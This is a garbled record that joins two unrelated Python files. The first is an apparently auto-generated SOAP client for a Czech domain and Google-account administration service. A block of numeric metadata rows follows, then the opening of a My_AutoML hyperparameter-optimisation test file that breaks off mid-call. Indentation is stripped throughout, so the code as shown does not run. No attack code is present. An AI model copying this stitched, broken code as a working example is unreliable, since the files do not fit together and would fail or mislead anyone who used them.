def DomainAll(self, ID_Login, ID, ID_Unit, DisplayName=None, ID_DomainState=None):
return self._client.service.DomainAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DisplayName": DisplayName, "ID_DomainState": ID_DomainState})
# Načíst seznam domén dostupné pro osobu
def DomainAllPerson(self, ID_Login, ID_Person, CanGoogleAccount):
return self._client.service.DomainAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "CanGoogleAccount": CanGoogleAccount})
# Načíst seznam domén jednotky
def DomainAllUnit(self, ID_Login, ID, ID_Unit, DisplayName=None, ID_DomainState=None):
return self._client.service.DomainAllUnit({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DisplayName": DisplayName, "ID_DomainState": ID_DomainState})
# Načíst seznam domén na kterých může uživatel založit účet pro danou jednotku
def DomainAllUnitCreate(self, ID_Login, ID_Unit, CanGoogleAccount):
return self._client.service.DomainAllUnitCreate({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "CanGoogleAccount": CanGoogleAccount})
# Načíst detail domény
def DomainDetail(self, ID_Login, ID):
return self._client.service.DomainDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst emaily založené pod doménou
def DomainDetailEmails(self, ID_Login, ID):
return self._client.service.DomainDetailEmails({"ID_Login": ID_Login, "ID": ID})
# Založit doménu
def DomainInsert(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Načíst seznam stavů domény
def DomainStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.DomainStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam jednotek přiřezené doméně
def DomainUnitAll(self, ID_Login, ID_Domain, ID, ID_Unit):
return self._client.service.DomainUnitAll({"ID_Login": ID_Login, "ID_Domain": ID_Domain, "ID": ID, "ID_Unit": ID_Unit})
# Smazat jednotku přiřazenou doméně
def DomainUnitDelete(self, ID_Login, ID):
return self._client.service.DomainUnitDelete({"ID_Login": ID_Login, "ID": ID})
# Založit jednotku přiřazenou doméně
def DomainUnitInsert(self, ID_Login, ID, ID_Domain, ID_Unit, IncludeChildUnit, Domain=None, Unit=None, RegistrationNumber=None):
return self._client.service.DomainUnitInsert({"ID_Login": ID_Login, "ID": ID, "ID_Domain": ID_Domain, "ID_Unit": ID_Unit, "IncludeChildUnit": IncludeChildUnit, "Domain": Domain, "Unit": Unit, "RegistrationNumber": RegistrationNumber})
# Upravit doménu
def DomainUpdate(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Odeslat požadavek na doménu na ústředí
def DomainUpdateActivate(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateActivate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Upravit alias domény
def DomainUpdateAlias(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateAlias({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Odeslat požadavek na doménu na ústředí
def DomainUpdateApprove(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateApprove({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Upravit DNS záznam domény
def DomainUpdateDNS(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateDNS({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Zapnout GA na doméně
def DomainUpdateEnableGA(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateEnableGA({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Odeslat požadavek na doménu na ústředí
def DomainUpdateSend(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateSend({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Upravit kdo na doméně může zakládat účty
def DomainUpdateUsing(self, ID_Login, ID, ID_Unit, ID_PersonCreated, OnlyMember, OnlyAfter15, OnlyCinovnik, OnlyAdminCreate, DateActivate, IsUsed, ID_PersonAdmin, ActivateGA, ID_DomainMain, ValidateDomain, ValidateAdmin, Hosting, DisplayName=None, Description=None, Unit=None, RegistrationNumber=None, ID_DomainState=None, DomainState=None, PersonCreated=None, Note=None, Alias=None, DNS=None):
return self._client.service.DomainUpdateUsing({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_PersonCreated": ID_PersonCreated, "OnlyMember": OnlyMember, "OnlyAfter15": OnlyAfter15, "OnlyCinovnik": OnlyCinovnik, "OnlyAdminCreate": OnlyAdminCreate, "DateActivate": DateActivate, "IsUsed": IsUsed, "ID_PersonAdmin": ID_PersonAdmin, "ActivateGA": ActivateGA, "ID_DomainMain": ID_DomainMain, "ValidateDomain": ValidateDomain, "ValidateAdmin": ValidateAdmin, "Hosting": Hosting, "DisplayName": DisplayName, "Description": Description, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_DomainState": ID_DomainState, "DomainState": DomainState, "PersonCreated": PersonCreated, "Note": Note, "Alias": Alias, "DNS": DNS})
# Načíst seznam kontaktů osoby
def GoogleAccountAll(self, ID_Login, ID_Person, ID, IsMain):
return self._client.service.GoogleAccountAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "IsMain": IsMain})
# Načíst seznam kontaktů osoby
def GoogleAccountAllUnit(self, ID_Login, ID_Unit, ID, IsMain, ID_GoogleAccountMain, IncludeChildUnits):
return self._client.service.GoogleAccountAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "IsMain": IsMain, "ID_GoogleAccountMain": ID_GoogleAccountMain, "IncludeChildUnits": IncludeChildUnits})
# Smazat účet v GA
def GoogleAccountDelete(self, ID_Login, ID):
return self._client.service.GoogleAccountDelete({"ID_Login": ID_Login, "ID": ID})
# Smazat hlavni účet v GA
def GoogleAccountDeleteMain(self, ID_Login, ID_Person, ID_GoogleAccount):
return self._client.service.GoogleAccountDeleteMain({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_GoogleAccount": ID_GoogleAccount})
# Načíst detail hlavního účtu jednotky v GA
def GoogleAccountDetail(self, ID_Login, ID):
return self._client.service.GoogleAccountDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam kontaktů osoby
def GoogleAccountDetailExists(self, ID_Login, IsMain, OnlyDb, Email=None):
return self._client.service.GoogleAccountDetailExists({"ID_Login": ID_Login, "IsMain": IsMain, "OnlyDb": OnlyDb, "Email": Email})
# Načíst detail hlavního účtu osoby v GA
def GoogleAccountDetailMain(self, ID_Login, ID_Person, LoadMainEmail):
return self._client.service.GoogleAccountDetailMain({"ID_Login": ID_Login, "ID_Person": ID_Person, "LoadMainEmail": LoadMainEmail})
# Založit účet v GA osobě
def GoogleAccountInsert(self, ID_Login, ID, ID_Person, ID_Unit, ID_Domain, IsMain, IsMainContact, Agrees, ID_UnitContact, ID_PersonContact, ID_PersonCreated, DateCreated, ID_GoogleAccount, OnlyValidate, Person=None, Unit=None, UserName=None, Domain=None, Password=None, Password2=None, PersonCreated=None, Value=None, LoginUrl=None, DisplayNameFirst=None, DisplayNameLast=None):
return self._client.service.GoogleAccountInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_Domain": ID_Domain, "IsMain": IsMain, "IsMainContact": IsMainContact, "Agrees": Agrees, "ID_UnitContact": ID_UnitContact, "ID_PersonContact": ID_PersonContact, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "ID_GoogleAccount": ID_GoogleAccount, "OnlyValidate": OnlyValidate, "Person": Person, "Unit": Unit, "UserName": UserName, "Domain": Domain, "Password": Password, "Password2": Password2, "PersonCreated": PersonCreated, "Value": Value, "LoginUrl": LoginUrl, "DisplayNameFirst": DisplayNameFirst, "DisplayNameLast": DisplayNameLast})
# Vynutit změnu hesla při dalším přihlášení do GA
def GoogleAccountUpdateChangePassword(self, ID_Login, ID, ID_Person, ID_Unit, ID_Domain, IsMain, IsMainContact, Agrees, ID_UnitContact, ID_PersonContact, ID_PersonCreated, DateCreated, ID_GoogleAccount, OnlyValidate, Person=None, Unit=None, UserName=None, Domain=None, Password=None, Password2=None, PersonCreated=None, Value=None, LoginUrl=None, DisplayNameFirst=None, DisplayNameLast=None):
return self._client.service.GoogleAccountUpdateChangePassword({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_Domain": ID_Domain, "IsMain": IsMain, "IsMainContact": IsMainContact, "Agrees": Agrees, "ID_UnitContact": ID_UnitContact, "ID_PersonContact": ID_PersonContact, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "ID_GoogleAccount": ID_GoogleAccount, "OnlyValidate": OnlyValidate, "Person": Person, "Unit": Unit, "UserName": UserName, "Domain": Domain, "Password": Password, "Password2": Password2, "PersonCreated": PersonCreated, "Value": Value, "LoginUrl": LoginUrl, "DisplayNameFirst": DisplayNameFirst, "DisplayNameLast": DisplayNameLast})
# Změna hesla
def GoogleAccountUpdatePassword(self, ID_Login, ID, ID_Person, ID_Unit, ID_Domain, IsMain, IsMainContact, Agrees, ID_UnitContact, ID_PersonContact, ID_PersonCreated, DateCreated, ID_GoogleAccount, OnlyValidate, Person=None, Unit=None, UserName=None, Domain=None, Password=None, Password2=None, PersonCreated=None, Value=None, LoginUrl=None, DisplayNameFirst=None, DisplayNameLast=None):
return self._client.service.GoogleAccountUpdatePassword({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_Domain": ID_Domain, "IsMain": IsMain, "IsMainContact": IsMainContact, "Agrees": Agrees, "ID_UnitContact": ID_UnitContact, "ID_PersonContact": ID_PersonContact, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "ID_GoogleAccount": ID_GoogleAccount, "OnlyValidate": OnlyValidate, "Person": Person, "Unit": Unit, "UserName": UserName, "Domain": Domain, "Password": Password, "Password2": Password2, "PersonCreated": PersonCreated, "Value": Value, "LoginUrl": LoginUrl, "DisplayNameFirst": DisplayNameFirst, "DisplayNameLast": DisplayNameLast})
# Načíst seznam google skupin
def GoogleGroupAll(self, ID_Login, ID_Unit, ID, ID_GoogleGroupMain, IncludeChildUnits, DisplayName=None):
return self._client.service.GoogleGroupAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_GoogleGroupMain": ID_GoogleGroupMain, "IncludeChildUnits": IncludeChildUnits, "DisplayName": DisplayName})
# Smazat google skupinu
def GoogleGroupDelete(self, ID_Login, ID):
return self._client.service.GoogleGroupDelete({"ID_Login": ID_Login, "ID": ID})
# Smazat uzivatele z google skupiny
def GoogleGroupDeleteMember(self, ID_Login, ID, Email=None):
return self._client.service.GoogleGroupDeleteMember({"ID_Login": ID_Login, "ID": ID, "Email": Email})
# Načíst detail google skupiny
def GoogleGroupDetail(self, ID_Login, ID):
return self._client.service.GoogleGroupDetail({"ID_Login": ID_Login, "ID": ID})
# Založit google skupinu
def GoogleGroupInsert(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Upravit google skupinu
def GoogleGroupUpdate(self, ID_Login, ID, ID_Unit, DateCreate, ID_GoogleGroupMain, ID_Domain, MemberCount, Valid, LastSync, DisplayName=None, Email=None, Unit=None, RegistrationNumber=None, GoogleGroupMainEmail=None, Description=None, EmailName=None, OwnerEmail=None, ID_SyncType=None):
return self._client.service.GoogleGroupUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateCreate": DateCreate, "ID_GoogleGroupMain": ID_GoogleGroupMain, "ID_Domain": ID_Domain, "MemberCount": MemberCount, "Valid": Valid, "LastSync": LastSync, "DisplayName": DisplayName, "Email": Email, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "GoogleGroupMainEmail": GoogleGroupMainEmail, "Description": Description, "EmailName": EmailName, "OwnerEmail": OwnerEmail, "ID_SyncType": ID_SyncType})
# Uložit členy skupiny dle emailu
def GoogleGroupUpdateMemberEmail(self, ID_Login, ID, EmailArray=None):
return self._client.service.GoogleGroupUpdateMemberEmail({"ID_Login": ID_Login, "ID": ID, "EmailArray": EmailArray})
# Uložit osobu jako člena skupiny
def GoogleGroupUpdateMemberPerson(self, ID_Login, ID, ID_Person):
return self._client.service.GoogleGroupUpdateMemberPerson({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person})
# Upravit roli uzivatele
def GoogleGroupUpdateMemberRole(self, ID_Login, ID, IsOwner, Email=None):
return self._client.service.GoogleGroupUpdateMemberRole({"ID_Login": ID_Login, "ID": ID, "IsOwner": IsOwner, "Email": Email})
| 119.244147
| 742
| 0.774191
| 3,799
| 35,654
| 7.069229
| 0.070545
| 0.055518
| 0.0687
| 0.035635
| 0.794087
| 0.767054
| 0.744415
| 0.710419
| 0.687519
| 0.685136
| 0
| 0.002013
| 0.108066
| 35,654
| 298
| 743
| 119.644295
| 0.842489
| 0.075335
| 0
| 0
| 0
| 0
| 0.194692
| 0.011401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.48
| false
| 0.04
| 0.006667
| 0.473333
| 0.973333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
c17e4144f6e5e784143887254d3c8e358d547425
| 28,287
|
py
|
Python
|
tests/test_hpo/test_hpo.py
|
PanyiDong/AutoML
|
4d981b0287fa27d7a38f029e4b20b3a89e1de4f9
|
[
"MIT"
] | null | null | null |
tests/test_hpo/test_hpo.py
|
PanyiDong/AutoML
|
4d981b0287fa27d7a38f029e4b20b3a89e1de4f9
|
[
"MIT"
] | null | null | null |
tests/test_hpo/test_hpo.py
|
PanyiDong/AutoML
|
4d981b0287fa27d7a38f029e4b20b3a89e1de4f9
|
[
"MIT"
] | null | null | null |
"""
File: test_regression.py
Author: Panyi Dong
GitHub: https://github.com/PanyiDong/
Mathematics Department, University of Illinois at Urbana-Champaign (UIUC)
Project: My_AutoML
Latest Version: 0.2.0
Relative Path: /tests/test_hpo/test_regression.py
File Created: Sunday, 10th April 2022 12:00:04 pm
Author: Panyi Dong (panyid2@illinois.edu)
-----
Last Modified: Wednesday, 11th May 2022 9:45:00 am
Modified By: Panyi Dong (panyid2@illinois.edu)
-----
MIT License
Copyright (c) 2022 - 2022, Panyi Dong
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
from ray import tune
import My_AutoML
from My_AutoML import load_data
# use command line interaction to run the model
# apparently, same class object called in one test case will not be able
# to run the model correctly after the first time
# detect whether optimal setting exists as method of determining whether
# the model is fitted correctly
# def test_stroke():
# os.system(
# "python main.py --data_folder Appendix --train_data healthcare-dataset-stroke-data --response stroke"
# )
# assert (
# os.path.exists("tmp/healthcare-dataset-stroke-data_model/init.txt") == True
# ), "Classification for Stroke data failed to initiated."
# # assert (
# # mol_heart._fitted == True
# # ), "Classification for Heart data failed to fit."
# assert (
# os.path.exists("tmp/healthcare-dataset-stroke-data_model/optimal_setting.txt")
# == True
# ), "Classification for Stroke data failed to find optimal setting."
def test_objective_1():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_1",
task_mode="classification",
objective="accuracy",
validation=True,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_2():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LogisticRegression
# test load_data here
data = load_data().load("example/example_data", "heart")
data = data["heart"]
features = list(data.columns)
features.remove("HeartDisease")
response = ["HeartDisease"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LogisticRegression": LogisticRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_17": "LogisticRegression",
"LogisticRegression_penalty": "l2",
"LogisticRegression_tol": 1e-4,
"LogisticRegression_C": 1,
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
model_name="obj_2",
task_mode="classification",
objective="auc",
validation=False,
valid_size=0.15,
full_status=False,
reset_index=True,
_iter=1,
seed=1,
)
result = clf.step()
clf.reset_config(params)
assert isinstance(result, dict), "Objective function should return a dict."
assert "loss" in result.keys(), "Objective function should return loss."
assert (
"fitted_model" in result.keys()
), "Objective function should return fitted model."
assert (
"training_status" in result.keys()
), "Objective function should return training status."
def test_objective_3():
from My_AutoML._hpo._utils import TabularObjective
from My_AutoML._encoding import DataEncoding
from My_AutoML._imputation import SimpleImputer
from My_AutoML._base import no_processing
from My_AutoML._scaling import Standardize
from My_AutoML._model import LinearRegression
# test load_data here
data = load_data().load("example/example_data", "insurance")
data = data["insurance"]
features = list(data.columns)
features.remove("expenses")
response = ["expenses"]
encoder = {"DataEncoding": DataEncoding}
imputer = {"SimpleImputer": SimpleImputer}
balancing = {"no_processing": no_processing}
scaling = {"Standardize": Standardize}
feature_selection = {"no_processing": no_processing}
models = {"LinearRegression": LinearRegression}
params = {
"encoder": {
"encoder_1": "DataEncoding",
},
"imputer": {
"imputer_1": "SimpleImputer",
"SimpleImputer_method": "mean",
},
"balancing": {"balancing_1": "no_processing"},
"scaling": {"scaling_2": "Standardize"},
"feature_selection": {"feature_selection_1": "no_processing"},
"model": {
"model_13": "LinearRegression",
},
}
clf = TabularObjective(
params,
)
clf.setup(
params,
_X=data[features],
_y=data[response],
encoder=encoder,
imputer=imputer,
balancing=balancing,
scaling=scaling,
feature_selection=feature_selection,
models=models,
